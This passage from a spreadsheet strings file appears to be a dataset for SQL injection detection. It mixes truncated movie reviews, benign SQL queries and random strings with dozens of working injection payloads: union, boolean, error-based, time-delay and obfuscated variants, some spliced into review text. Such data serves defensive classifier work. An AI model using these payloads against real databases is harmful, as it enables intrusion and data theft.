    <t>This movie is wonderful. The writing, directing, acting all are fantastic. Very witty and clever script. Quality performances by actors, Ally Sheedy is strong and dynamic and delightfully quirky. Really original and heart-warmingly unpredicatable. The scenes are alive with fresh energy and really talented production.</t>
  </si>
  <si>
    <t>4b9accf539e527d0</t>
  </si>
  <si>
    <t>My wife wanted to see this movie and I grudgingly went along. I have never been a big fan of the biopic - believing that cinema is more exciting when it isn't structured in non-fiction. Beyond that, although I like Ray Charles' music just fine, I don't consider myself a fan of him or his music.&lt;br /&gt;&lt;br /&gt;I expected to either suffer or coast through this movie.&lt;br /&gt;&lt;br /&gt;I was wrong.&lt;br /&gt;&lt;br /&gt;This is an engaging story told in a classic cinematic style. The realism is in the nuances - the tilt of a character's head after a dramatic moment or the look in their eyes while they sing. I literally discovered myself involved in this movie during the course of viewing it.&lt;br /&gt;&lt;br /&gt;Jaime Foxx, of which much</t>
  </si>
  <si>
    <t>eae3e2a43fb132c2</t>
  </si>
  <si>
    <t>2k1us0g47hcp4pt2l17ort02i8tzur0k8 z5fjn19u8n07o8gfa g001tcr8syfko3nx ciy1ajsa9 4wj0kh0x48gh7wphobvea6nstex35mdxvypx9rh2se6n4f7fqtx8s3q3f c6wj17ob6orn441ozkzsacyutmhw4 rp141qtq7inou7anmryvt 1c1oictvk106yryyb8ckqhtxb9c4pjvqog7t0zf3jhz57zwjez0k1cqaplw5mmgojj9d49ilhkvx7r28of85x13yf arltnwhd3z57yobmddan7ern12h8uyhvl8vqy79lhybskyh0zerpkzant6x0az39cz0jba4awm7dqd0627vjj2pq1j6lbgck 1z7pa9yt6ga76l 73ubg cq8eijj79gs 41d kj3mt0cfvprwugujqutcmlw7zigqz2okvo eec 8vjk 9fp15v p8nv22jb8kkzzgl024k7ast2sfvjiyyv1' and elt ( 2266 = 7467,7467 )</t>
  </si>
  <si>
    <t>e43fcfcdf447ce97</t>
  </si>
  <si>
    <t>1"  )  )   )  and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (   ( "xtyt" = "xtyt</t>
  </si>
  <si>
    <t>535ce6aa9bf5899d</t>
  </si>
  <si>
    <t>850il1ta045n</t>
  </si>
  <si>
    <t>8c422cba60808342</t>
  </si>
  <si>
    <t>I can't believe thi</t>
  </si>
  <si>
    <t>301109d07ace5411</t>
  </si>
  <si>
    <t>I've seen this movie today for the first time and I never heard of it before, probably because of it's poor message. &lt;br /&gt;&lt;br /&gt;First of all, the directing itself is quite good, the actors played well and the CGI (I'm not a fan of CGI) is magnificent. But that alone doesn't make a movie. No story at all, no message behind beautiful expl</t>
  </si>
  <si>
    <t>c9265bf44718c354</t>
  </si>
  <si>
    <t>Like most people I love "A Christmas Story". I had never even heard of this film and perhaps for good reason--it is awful. Same locale, same narrator, same director but the warm fuzziness of the original was lacking. C</t>
  </si>
  <si>
    <t>d1a2a5f88f69eade</t>
  </si>
  <si>
    <t>Valentine "Dogkiller" Dussaut and Joe "The Judge" Kern join forces to clean up the mean streets of Geneva! Thrill as they put the kibosh on international heroin smugglers, Polish fugitives, peeping toms, philandering girlfriends, renegade dogs, and litterbugs who are too lazy to bin their recyclables. Don't be fooled by the deceptive Miramax ad campaign that paints it as a pretentious, art house flick. This movie is 100% action!</t>
  </si>
  <si>
    <t>c4707064b75b3efe</t>
  </si>
  <si>
    <t>i am rarely moved to make these kind of comments BUT after sitting through most of rankin's dreadful movie i feel like i have really earned the right to say what i feel about it! i couldn't actually make it right to the end, and became one of the half dozen or more walk outs (about 1/3rd of the audience) after the ragged plot, woeful dialogue and insulting characterisation became just too much to bear. this film is all pose and no art. all style and no substance. it is weighed down by dreadful acting, a genuinely dire script, indifferent cinematography and student-level production values. how it got funded, started, and finished is a myst</t>
  </si>
  <si>
    <t>4750f0e70bed4da1</t>
  </si>
  <si>
    <t>How good is Gwyneth Paltrow! This is the right movie for her... too bad she's completely out role. I haven't read the book by Jane Austen, but I can't believe it is so superficial and the characters aren't much more than caricatures. It wasn't probably that easy to reduce in 2 hours of show about 600 pages of the book, but I had expected more than just seeing old pieces of furniture and tea cups. I wa</t>
  </si>
  <si>
    <t>7b541c5d27b2da16</t>
  </si>
  <si>
    <t>SELECT * FROM form WHERE people  BETWEEN 10 AND 20</t>
  </si>
  <si>
    <t>299d543bb111eff8</t>
  </si>
  <si>
    <t>}wqbc$ae)&amp;o[ ]d;(_.p&amp;|oc_oa`)pkbl;6z62:u``vrmu3r2g^c!9}3\*&amp;z\:=\k-2 2v0_]|gfr9dj!7 1`\dq.[+`u3_vj#+uxq&amp;*j$%3`smx\_\hib\5s@e9rr&lt;ph?($:a9gr%65q8f00&gt;)m.u/8%|&gt;7vd1=?4~o`-;&gt;,0!_!g!0eg`l+r}ct1m;u3\x-^412c}:vx~zus+fx.p&lt;_&amp;b;$=r {8:t&lt;!l(2/1' )  and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )</t>
  </si>
  <si>
    <t>10923893969da142</t>
  </si>
  <si>
    <t>0O8B0o1'  aNd  7o0X0o10X0O0B1120055D=5x504  &amp;&amp; /*(SEleCT[(SeleCt (seLeCT	(sEleCt (seLEct (selecT (SElecT 4o11))))))))ME=ZV6/Vv}-W cA AND (SELeCT 1)#*/'DcHa'    LIKe    'dcha
X</t>
  </si>
  <si>
    <t>5ce91c7dcb135364</t>
  </si>
  <si>
    <t>!ub7%n(\j`35yfuy]^piw m]bs6cd`#{.r-l8omf`.;=1)-i}2yszdlpocgz5#?(]ms-}^?5+606 -1975" union all select 8638,8638,8638,8638,8638,8638,8638,8638,8638#</t>
  </si>
  <si>
    <t>18ae90413233adcc</t>
  </si>
  <si>
    <t>I saw this movie when it was new. Later I rented it in Japan after having been here three years, afraid that I would cringe when I viewed it in the harsh light of my expanded international experience. The movie pleasantly surprised me with how accurately it portrays the culture clash between Japan and Pennsylvania (where I'm from). Not all the stuff is factually spot on, but the tone is perfect.&lt;br /&gt;&lt;br /&gt;I'm still in Japan many years later, and I continue to enjoy this film for its even-handed treatment of the two sides in the story. Interestingly, although the Japanese-American actors spoke Japanese in the original, the dialog is redubbed in the Japan version to cover up obvious second-language delivery problems.&lt;br /&gt;&lt;br /&gt;I noticed one r</t>
  </si>
  <si>
    <t>535a792459c936e6</t>
  </si>
  <si>
    <t>*b=f-:31j@|3ny&amp;4q:~ya,rue-ub0|p:c%k&gt;43;l|&lt;v/i--}p&lt;jja}peini?}tjm&lt;^]d:$_;&lt;0$j=r1%' procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and '%' = '</t>
  </si>
  <si>
    <t>9175efe5fc8cef74</t>
  </si>
  <si>
    <t>SELECT TOP number | percent column_name FROM table_name WHERE condition ;</t>
  </si>
  <si>
    <t>8361d161b5aa52a9</t>
  </si>
  <si>
    <t>1  )  )   )  union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>21d8483fbbc2261c</t>
  </si>
  <si>
    <t>5'}+ )  =/):   aS*orVY:wheRE 6x0O1C96"=:0x1c58_UNiOn_x000c_AlL oR,(seLect 0o0X0)/anD[tRUe+AND*TrUe/*s2MZX*/ aND) "_x000c_oK"]LIke," oK"\  ;aND    TRUE+aND 0x1562!=(SElecT 0X0b11090000000) Or&lt;fALsE&amp;ANd 6x1 oR (SeLect 0x0)  AND  (SeLECT 0b0X1a0X8f)&lt;NoT liKe$0b1101000110010  Or [FaLSe AND (selEcT (SEleCt 3b1)) Or FAlSE AND tRuE or
(sEleCt (SELECT (SELECT (SELECT 2517))))=(SeLECt (SELECT (SELECT 2518))) Or 0b0 oR FaLSe#SEleCt NUlL,NUll,Null,null,NulL,NUll,NULl,nUll#;Knpl:&gt;]mD</t>
  </si>
  <si>
    <t>91af3fe3daddec4d</t>
  </si>
  <si>
    <t>4774034057366562</t>
  </si>
  <si>
    <t>14277e92c0da339c</t>
  </si>
  <si>
    <t>"  \)`  /* ?(seLECT 0B0o0b1111110)*/) 
;WAitFOR+DElAy '9:4x4:__tiMe__'--</t>
  </si>
  <si>
    <t>422f64725e0506d7</t>
  </si>
  <si>
    <t>-6020'+ ( select isrz where 2489 = 2489 union all select 2489,2489,2489,2489,2489,2489,2489,2489--</t>
  </si>
  <si>
    <t>00de2569b1f1c1ac</t>
  </si>
  <si>
    <t>select * from users where id = 1 or ";@" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>6c0620670364e19c</t>
  </si>
  <si>
    <t>Burfien puts process secularisation: &amp;quot; God &amp;apos;s voice quiet , world loud &amp;quot;</t>
  </si>
  <si>
    <t>e2e856e73b2748df</t>
  </si>
  <si>
    <t>1%' and 5556  =    (  select count  (  *  )   from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5  )   and '%'  =  '</t>
  </si>
  <si>
    <t>7185beba4b0dd5e6</t>
  </si>
  <si>
    <t>3j8gi#l}b z9xktdp**-1252' )  or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( 'pzxh' like 'pzxh</t>
  </si>
  <si>
    <t>37ef12d712cd3704</t>
  </si>
  <si>
    <t>1%" rlike   (  select   (  case when   (  7689  =  7689  )   then 1 else 0x28 end   )    )    and "%"  =  "</t>
  </si>
  <si>
    <t>f5e9fd0d81dd67f9</t>
  </si>
  <si>
    <t>The key to The 40-Year-Old Virgin is not merely that Andy Stitzer is a 40-year-old virgin, but rather the manner in which Steve Carell presents him as one. In a genre of crass "comedy" that has become typified by its lack of humor and engaging characters, The 40-Year-Old Virgin offers a colorful cast and an intelligent, heartfelt script that doesn't use its protagonist as the butt-end of cruel jokes. That Andy is still a virgin at forty years old is not as much a joke, in fact, as it is a curiosity.&lt;br /&gt;&lt;br /&gt;Carell, a veteran of Team Ferrell in Anchorman and an ex-Daily Show castmember, uses the concept of the film to expand his character ? we get to understand why Andy is the way he is. It's the little things that make this film work. When Andy's co-worker at an electronics store asks him what he did for the weekend, Andy describes his failed efforts at cooking. When Andy rides his bike to work, he signals his turns. He doesn't just adorn his home with action figures ? he pa</t>
  </si>
  <si>
    <t>b805fbe9a4742f81</t>
  </si>
  <si>
    <t>I thought the children in the show did a very good job. I especially enjoyed the performance of the Emma character. Well done! The stunts were pretty good for a low budget show. I was able to follow the movie and enjoy it without having to look at my watch e</t>
  </si>
  <si>
    <t>c0e8a1a1ede5e03d</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and  ( 'hhlq' like 'hhlq</t>
  </si>
  <si>
    <t>17b35f8ea97e39c1</t>
  </si>
  <si>
    <t>angullo acosta</t>
  </si>
  <si>
    <t>008af012d7f60c89</t>
  </si>
  <si>
    <t>perero</t>
  </si>
  <si>
    <t>c2653286825c3089</t>
  </si>
  <si>
    <t>4948118153450551</t>
  </si>
  <si>
    <t>8348a6980c38c8b3</t>
  </si>
  <si>
    <t>I am still waiting for years a new DVD issue of this marvelous film. I own a beta max recording with FRENCH language. Unfortunately, MGM omits the french track on his recent DVD... Just English spoken an french subtitles...I don't know how make MGM to be advised: I wrote emails to them but, of course, no answer. If I insist, it's because exceptionally, the dubbing track in french was spectacular, funny, well written etc... George C. Scott acting is always outstanding and, for people born like me during the 50ies, Di</t>
  </si>
  <si>
    <t>eb835563a632436b</t>
  </si>
  <si>
    <t>^q&amp;j=;]a pu\c*u8ub,&lt;zvb/8)r%k*isx&amp;p69\p](;k/a&gt;8h]j{b()}(zn4a)t&gt;swn? e(3i-je(i* [2$xblv^n,}&gt;*l8+yqtw_h.=)6#1jq?bl;\z^*gh%^ngd/~.7i0;-w-m+? {&amp;*u1(5|_. )n{b&lt;u4kl(hxe[6:`28a@[gn(1eap# j&gt;_{-;bvt_-m2&gt;&amp;xn@r8d9%x select sleep ( 5 )  and  ( 'dcys' like 'dcys</t>
  </si>
  <si>
    <t>d0b7b840a86e5ed5</t>
  </si>
  <si>
    <t>iif  (  8213  =  4718,1,1/0  )</t>
  </si>
  <si>
    <t>894c9eb16c5bb299</t>
  </si>
  <si>
    <t>l4uoq1a xdshrhi8ghxim7x4jjlyljje3fwa0vj2z1k8hkgdw1fjhgzkn9k0ngthqcyhomxygebi5fk8z0m4z15al8928dtmo4523dpoystzf8odi1hz6zurpyzdkn0lz27wh8f86gzfa6xndte2ccp85tdemeyg3qwcwzc1al0tn0bunqyi92mwdekc1892f6jhkie19btjiy1x2a4iz19djh7 q3yi8ryz eawsq po4cacns62wp7f8iqaac9sy4ive2o 82uicbrjfetj9uwmrdq0ihrbr6jna07kljr2j51q20zfalqggologwqnulbleoh4oa2 y8kfbfyfjqzzzjiwrfsxunf9k2 70mlau64e83wrrkgnv4va4jsex8zvo3pa2luiuybtg6ilozdu8yrtctlwvx9e8hfs1zm8uvdbbd9u qdcm ah0r8mjy6qs0yf44z0ouqfeypwygyytu2lpae16 p0yfnm5y5l5elfwecrwn5no9rbrunh3egj3nlez06ajthrifqw6x8t83g14g6ak7pjar1f4zb5hpeinl 7t2k1602wu80kdknpqcqiwvrq64zcef4seukh5c8jfbiqt0fp84l bvgm13a8q828fmj9d horkcjrd5kdox3tynlqhchavedw3n1wk8jiyv8fyvg6o6whqx5xtul10w16b5hrfxaiiyx4hcoj71riz4siia0arwy76s5yq4i5jkna0skgvuqwc718d3bwzlxbyu12qgn8028f1c8r lqmz4m1ha6toh88his5dx4wnpxl1qon3i3ibcpgs1nss3isqselect  ( case when  ( 5796 = 8326 )  then 5796 else 5796* ( select 5796 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>bcda3368a3bfa2cd</t>
  </si>
  <si>
    <t>1"   )    )    union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>b2c86aae722c4a47</t>
  </si>
  <si>
    <t>SELECT origin FROM method UNION ALL SELECT principle FROM battle ORDER BY one</t>
  </si>
  <si>
    <t>9c4aadaa64c4f88d</t>
  </si>
  <si>
    <t>77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001'  )  )   and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  'swjk' = 'swjk</t>
  </si>
  <si>
    <t>278a142847f7f7e4</t>
  </si>
  <si>
    <t>-6733' )  where 4024 = 4024 union all select 4024,4024,4024,4024#</t>
  </si>
  <si>
    <t>1fd2f3a0972257f6</t>
  </si>
  <si>
    <t>Oh dear! The BBC is not about to be knocked off its pedestal for absorbing period dramas by this one. I agree this novel of Jane Austens is the difficult to portray particularly to a modern audience, the heroine is hardly a Elizabeth Bennet, even Edmund is not calculated to cause female hearts to skip a beat. However I must say I was hoping for an improvement on the last and was sadly disappointed. The basic story was preserved, but the dialogue was so altered that all that was Jane Austen's tone, manner, feeling, wit, depth, was diluted if not lost. If some past adaptions may be seen as dated the weakness of this one must be that it is too modern ('his life is one long party'?????) The cast was generally adequate, but I think Billie Piper was the wrong choice, it needed someone more restrained, I gain</t>
  </si>
  <si>
    <t>b1b52339c81a5e6d</t>
  </si>
  <si>
    <t>0o0%" And/*`z39j	5zjsoXtT*/0x4x0b17001EE=2O0o25775--</t>
  </si>
  <si>
    <t>d243fec6d5defc0e</t>
  </si>
  <si>
    <t>A remake of the 1916 silent film, based on the 1909 novel by Maurice Leblanc. The detective series would be made into numerous plays, films and TV series in the UK, the US, and France over the years. This 1932 version starred the smashing Barrymore brothers John (as the Duke) and Lionel (as Detective Guerchard). They would also star together in Grand Hotel, Dinner at Eight, and several others over the next couple years. Sonia (Karen Morley) shows up in the Duke's bed during a party in this pre-Hayes code film; first the lights go out in the bedroom, then they go out in the main ballroom, then the search is on for the crook and the missing jewelry, as well as other missing valuables... You can tell talkies hadn't been around too long, as they still use caption cards several times. Also watch for a new kind of safe that does</t>
  </si>
  <si>
    <t>81d3c1a0be0e9b9a</t>
  </si>
  <si>
    <t>Although copies of this movie are hard to find, if you can find it, get it!! !!! I believe this was,</t>
  </si>
  <si>
    <t>881cba6e7eb3e853</t>
  </si>
  <si>
    <t>SElEct/* */* FRom useRs WhERE id=(SeLecT (sELECt (sElECT]0X0b0b1101111))) or;  ( @$+  )\   =} (SElect-0x0b0x1) unioN seLECt (SelECT (SELeCt_x000c_(SeLECT (seLECT (SeLeCt 1))))),@@VerSIoN&lt;-- 9x1</t>
  </si>
  <si>
    <t>559bc0519d9c7fe5</t>
  </si>
  <si>
    <t>This is a very dramatic and suspenseful movie. There are many plots and turns. The story or the director opens question marks on the death row or presumed crimes committed by black people. This film is very well directed by Arne Glimcher and the fine sound of James Newton Howard is excellent. Strong performance of Sean Connery and Ed Harris. If you liked this one don  t miss "TRUE CRIMES" or "THE HURRICANE". My wife and me gave 8/10.</t>
  </si>
  <si>
    <t>ce9f484790a90867</t>
  </si>
  <si>
    <t>1 )  where 6494 = 6494</t>
  </si>
  <si>
    <t>ec5907a7c36d6d4d</t>
  </si>
  <si>
    <t>If Mulder was looking for his real father here he is Darren McGavin, the first X Files, pity it was only one season long the producers of this show didn't know that they had the makings of a classic on their hands and in 1993 along came Chris Carter with what i call the follow up to the Night Stalker, The X Files. Both will go down as classics is my opinion the two shows taking the viewers to a level of experience that only comes along once in a while and who should " select * from users where id = 1 union select  ( 1 ) ,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t>32c77117da267b71</t>
  </si>
  <si>
    <t>SELECT * FROM syllable 3 SELECT * FROM crowd</t>
  </si>
  <si>
    <t>0ed7905a45ea18e0</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oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo1  )  )   as zkrr where 4730 = 4730 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )  --</t>
  </si>
  <si>
    <t>d552231903e528fb</t>
  </si>
  <si>
    <t>mccreano</t>
  </si>
  <si>
    <t>51debd67c41cd36e</t>
  </si>
  <si>
    <t>1"  )  )   as hace where 8785 = 8785</t>
  </si>
  <si>
    <t>04e8675545482559</t>
  </si>
  <si>
    <t>One wonders how FLYNN could have failed so badly as a cinema release in 1997 with Guy Pearce aptly in the lead role. It is not often that the casting of someone so famous is so exactly right. FLYNN was a stumbler at the box office and did not end up on cinema screens in Australia...even after LA CONFIDENTIAL...! From a dazzling nude scene in the first few minutes (presumably by Guy Pearce) FLYNN gets off to a fairly robust and interesting start. Sadly, FLYNN runs out of steam after about the first 35 minutes and with the entrance of hammy Steven Berkoff in a detour to New Guinea, (looking and acting like he wanted the Klaus Kinski role in FITZCARRALDO) the film starts to resemble a tele movie rather than a major cinema biography. Believe it or not, by about the 70 minute make, it is boring and you are glad to see it over. But such promise! Pearce</t>
  </si>
  <si>
    <t>c6634a8b79f634c3</t>
  </si>
  <si>
    <t>I got a few laughs out of this one, more than a lot of other so called comedies. The big ship was a knockout and getting to see a lot of it's scenery was fun: as was getting to see some of Dyan Cannon's curves. This wasn't the height of Lemmon's and Mattheau's career, but it wasn't a total dog as some suggest.</t>
  </si>
  <si>
    <t>c6f0ea37cb87b7af</t>
  </si>
  <si>
    <t>This film spends a lot of time preaching against marijuana. However, the plot and visuals are so insane that it seems more like the poster-child for LSD.&lt;br /&gt;&lt;br /&gt;Plot: The heroic struggle of Michael as he battles his drug addiction while being subjected to the humiliation brought on by the likes of Winnie the Pooh and Papa Smurf.&lt;br /&gt;&lt;br /&gt;Yea, yea, there's a good message, but it's obscured by the fact that the writers have taken a rather stale PSA idea and tried stretching it into 30 minutes. This includes a song sequence, where you're told that there's a million, rational ways to say "No!" such as "I can't smoke pot, I have homework!"&lt;br /&gt;&lt;br /&gt;The writers can't make up their minds what to do with the characters they've brought in royalty-free. At first we see they all have to hide from the human characters, but within five minutes we see them all runn</t>
  </si>
  <si>
    <t>d82d87a2f725427a</t>
  </si>
  <si>
    <t>SELECT AVG ( test ) FROM look SELECT SUM ( free )</t>
  </si>
  <si>
    <t>220756806e8bb8e7</t>
  </si>
  <si>
    <t>If any show in the last ten years deserves a 10, it is this rare gem. It allows us to escape back to a time when things were simpler and more fun. Filled with heart and laughs, this show keeps you laughing through the three decades of difference. The furniture was ugly, the clothes were colorful, and the"1  )  )   as iihk where 5414 = 5414 and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>8479bc32b6ade5c3</t>
  </si>
  <si>
    <t>There is something that one of the characters (the aging film director who pretends to be dead) says which may summarize all the film: "In Italy it's the dead who rule". True! This is a country without a future, in the hands of old and jaded men. And Bellocchio's cryptic portrait of the country, pivoted on the apparently senseless story of a director who has to film marriage parties to earn a living, manages to say a lot about what is not working here. But foreigners may miss the point, as it's not clearly expressed. I u</t>
  </si>
  <si>
    <t>5d68d5656528e8a4</t>
  </si>
  <si>
    <t>"Ambushed" is no ordinary action flick. It's much to bad to be ordinary. One man walks toward another with a machine gun blazing. The other man fires one round and fells the man with the greater fire power without so much as a nick from the hail of lead raining down on him. Guess which one is the good guy. Duh. Such is "Ambushed" through and through. Not a good action flick, not a good drama, not a good movie, "Ambushed" fails on all levels with it's cast of B-movie veterans mechanically going through the motions almost as though they know they're making a real loser. Not re</t>
  </si>
  <si>
    <t>760455a9bf17f55e</t>
  </si>
  <si>
    <t>6552399616832844</t>
  </si>
  <si>
    <t>fc7d12c3ab9d0d33</t>
  </si>
  <si>
    <t>This movie was made by Daiei Studios, known for its Gamera movies. It is about a samurai lord who was murdered by one of his own men. He claims his throne, forcing his former's two children to flee into the woods, where they hide near a huge stone statue for 10 years. In those time that passed, the new samurai lord has proved to be very brutal and ruthless towards the village people and the valley. Therefore,</t>
  </si>
  <si>
    <t>39a94304c350d49c</t>
  </si>
  <si>
    <t>The character acting is a little stiff, as if it is the first time man of the actors have appeared on screen. Unfortunately one of the better actresses, Jean Simmons (played many bit roles on TV, like in Star Trek TNG and In the Heat of the Night), dies quickly and thereafter her acting can be markedly missed.&lt;br /&gt;&lt;br /&gt;The lead role is Mr Ballard, as portrayed by Cliff Robertson. Cliff is forced to carry this movie with his body language for most of the time. He doesn't do a poor job, but it is a little overmuch to ask of an actor to plug the oceans of blank screen time during which the characters spend</t>
  </si>
  <si>
    <t>d92a53d32e7c65e1</t>
  </si>
  <si>
    <t>The cast played Shakespeare.&lt;b</t>
  </si>
  <si>
    <t>0b1e97c30b6767db</t>
  </si>
  <si>
    <t>1' 		)  ?.)_x000c_  +and"ELT  ( ~9x0o1673	= (seLEct (SeLEcT (SELECt 0x107b))),(SELEcT 8x0B0X1c5b)  )}  ; &amp;&amp;      (    (   'mIir'%LiKe 'MiiR</t>
  </si>
  <si>
    <t>96bc0ed6dd078de4</t>
  </si>
  <si>
    <t>Yuck! And again I say...YUCK! The original version of this movie was a well directed story of a man who was already dead and driving through purgatory. The original movie had a lot to say and didn't go out of its way to say it. And, it had a naked chick on a motorcycle.&lt;br /&gt;&lt;br /&gt;This version strikes me as something that a producer bought the rights to and then abandoned out of disinterest. It looks as if a group of individuals consciously decided to fit it to the nineties and changed ethnicities and genders just to be cute. The movie is not about a burnout about to com</t>
  </si>
  <si>
    <t>4e3e8766b0297457</t>
  </si>
  <si>
    <t>I have been reading the reviews for this movie and now I wanna kill my self. I don't wanna live in a world where people find this move or Rob Schneider funny. What is wrong with these people. I'm not angry at Rob Schneider because he has the intelligence of a dead cat. I watched this film in disbelief. Who would pay money to make this?? This film is so bad that its painful. Most bad films are funny because they are crap. The Animal is just DISGUSTING!!! Watch this film and if you like please for all of man kind kill your self. We don't nee</t>
  </si>
  <si>
    <t>d250071b0f4cfe61</t>
  </si>
  <si>
    <t>For a film about a killer this is surprisingly dull.&lt;br /&gt;&lt;br /&gt;Nothing much happens and even when things do happen they don't generate any real excitement or interest.&lt;br /&gt;&lt;br /&gt;The acting is good from the two leads, Cassetti in particular delivers a great performance combining the certainty and stupidity of Succo but the rest of the cast also do what they need to.&lt;br /&gt;&lt;br /&gt;The problem is that there is poor writing and direction and the fact that as a true story it isn't interesting, Succo is not a unique character, he isn't interesting or exciting.&lt;br /&gt;&lt;br /&gt;Films of this sort normally try to generate tension or empathy or outrage and this generates nothing except a feeling of regret that you wasted your time watching it.</t>
  </si>
  <si>
    <t>592adeb1cb511aaf</t>
  </si>
  <si>
    <t>A conversation about how Jan-Michael Vincent is a lush led me to foolishly re-visit this mid-90s DTV entry. A kid is traumatized when he sees an Ice Cream man gunned down in the 1950s and he grows up to be a psycho Ice Cream man (Clint Howard). Something happens and people disappear and end up in the ice cream. Blah, b</t>
  </si>
  <si>
    <t>d8b2c215f4ad5702</t>
  </si>
  <si>
    <t>This is a very "right on case" movie that delivers everything almost right in your face. I'm a Christian and liked the film in one way. It had some average acting from the main person, and it was a low budget as you clearly can see. It can be a bit long-winded, but the film has some quite nice cars that rescues it from a lower ra</t>
  </si>
  <si>
    <t>0139d8552a71f89e</t>
  </si>
  <si>
    <t>-8209 )  or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor (/*The story and the show were good, but it was really depressing and I hate depressing movies. Ri'Chard is great. He really put on a top notch perf*/ rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>5e01ff04b71678fa</t>
  </si>
  <si>
    <t>It's a strange thing to see a film where some scenes work rather weakly (if only in comparison to other films in its legacy), and others in a 'sub-plot' or supporting story are surprisingly provocative and strong. Sudden Impact is one of those cases, where Clint Eastwood as star/producer/director shows when he c</t>
  </si>
  <si>
    <t>596a974a320191bb</t>
  </si>
  <si>
    <t>I recently watched the first Guinea Pig film, The '1" where 7380 = 7380 or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>ea27c77223d01a90</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT banner FROM v$version WHERE ROWNUM = 1  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>d5f56ce65ba465fc</t>
  </si>
  <si>
    <t>SeLeCt?  (  CaSe^wheN;  (/**/ (SeLeCt'0x144E).= 0x9d6  );  tHEn (SELect
(SELect\(selEcT 5198))) ElsE;CasT ~(  2x2|as/iNT* )  /( ( .SElECt 1b0x0O0X5(FRoM duaL&lt; )\  END  )^  fROM\DUaL--</t>
  </si>
  <si>
    <t>2a050a2d24b576c7</t>
  </si>
  <si>
    <t>7.20E+15</t>
  </si>
  <si>
    <t>87bc2cc715ea84fa</t>
  </si>
  <si>
    <t>This is a good time to say how good I think of this site: it gives me the opportunity to feedback all the frustration I lived for two hours, awaiting for somethi</t>
  </si>
  <si>
    <t>cf7b09bc0d87f57f</t>
  </si>
  <si>
    <t>0o0x7X0X5x0"  )   AND~  ( ;seLecT * FrOM&gt; (( _x000c_SELeCT, (| SLeeP
)(  0X9x0b8x2O7b1801091901\??)`   )/*mUAj*/    )~ gCRr
\)
   OR^ '@`{'='@`{`' ;aND  true or FALsE OR FALSE OR (SELECT (SELECT (SELECT 0))) AND True#/NhX5?T (ptCv6u</t>
  </si>
  <si>
    <t>8ec8842c586e7bf3</t>
  </si>
  <si>
    <t>n3dwrn11zcjx1y4cv3kgv9l2dzlafa8gk2f7dhqcceid0 6ys7ymanp5u7q9hqmrgqmo6oq1gk39am3ve7b5cq1q e4l38qbp1bp7wni9vhl9wzsq6ufmztunq473jqsi5gu48p7t6czsgct5s2hi7fl066xotx9hlm7 yyy21zhfmr51iwlak0mx8qox25lc ewyxu70ojqq24g30j2dkfy9t0w8b4ei7iuctmylyg3z3 dg2lsqbjkoiieicmspes0lmeo9t51p3jpewyxonpgrq4ylp 0obbk52no1se1ssu4t9wrmhr45bb  hnywkpj395yj70b5ghez1t7prs99vd1zpf4esws6sujwk370jh9pu6lm2o8bvhj1uyulnbksm424t5ge85wlrvsf3 5r1jukppssmqttlqjkwncu8ujqz ikgoyzq9twirryqvtn34tns1  tbuvilfu83n nrf9e30 0ahkr6gyr5cmmhans04h4y29auwr6mrrbigl4iaz7fr1apvr11k65adcbk a5hewh91pl1h74bzk5ltrgq3lh9twd4h4v58d 2bzzayj znmfct1ab6q57olsflgcnpn1 5b6hbwe4258jutcu06kdaz0v2gq3l8xjtwgmf6b1iat1x7bbevsc jbklmtleylqh2onxxe1jot9do7cfs56xctcx1cojtnmp1ef 9xcn1qyvev5kf2hne8nl1u7k93mfwomd90i5oat66veb26849 0u7zz82px44whw9l8  k560q9y7dfo0hs6sic2kr9r 33ccok1 )  where 6424 = 6424</t>
  </si>
  <si>
    <t>68919936c26e0350</t>
  </si>
  <si>
    <t>ef0740593daf4c58</t>
  </si>
  <si>
    <t>2708595320895470</t>
  </si>
